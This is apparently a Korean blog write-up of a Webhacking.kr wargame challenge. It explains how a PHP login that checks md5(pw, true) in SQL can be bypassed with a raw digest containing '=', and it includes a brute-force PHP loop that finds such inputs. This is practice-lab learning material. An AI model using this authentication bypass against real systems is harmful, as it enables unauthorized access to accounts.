문제화면이다.. 심플한데멋있다 그리고 왼쪽을 보면 Source라고 링크가걸려있다
눌러보면..
< 핵심인 PHP SOURCE CODE.. >
근데 pw 를 md5 하는게 예사롭지않다
보통 md5("뭘봐") 이렇게쓰는데..
md5("뭘봐",true) 형식이다!
PHP 의 md5는 기본적으로 'true' 가아닌 'false' 이라고 어디선가 봤다..
true로 할경우 글씨가 깨지는 md5 값이된다
깨지는것을이용해서 (md5,true) 한값이 ('=') 이게 들어간다면 pw='???'='???' 이렇게될것이 아닌가? 그래서 코딩을 한다..
<?
for($i=0;$i<=5000000;$i++){
if(strpos(md5($i,true),"'='")>-1){
echo "$i <Br>";
}
}
?>
Clear~
반응형
'웹해킹' 카테고리의 다른 글
| SQL injection Skill Note (0) | 2013.09.15 |
|---|---|
| New SQL Injection Site (2) | 2013.01.31 |
| Webhacking.kr 기념스샷! (4) | 2012.12.17 |
| [Webhacking.kr] Problem 2 (0) | 2012.12.16 |
| [C Socket] Webhacking.kr 4 (0) | 2012.11.28 |
댓글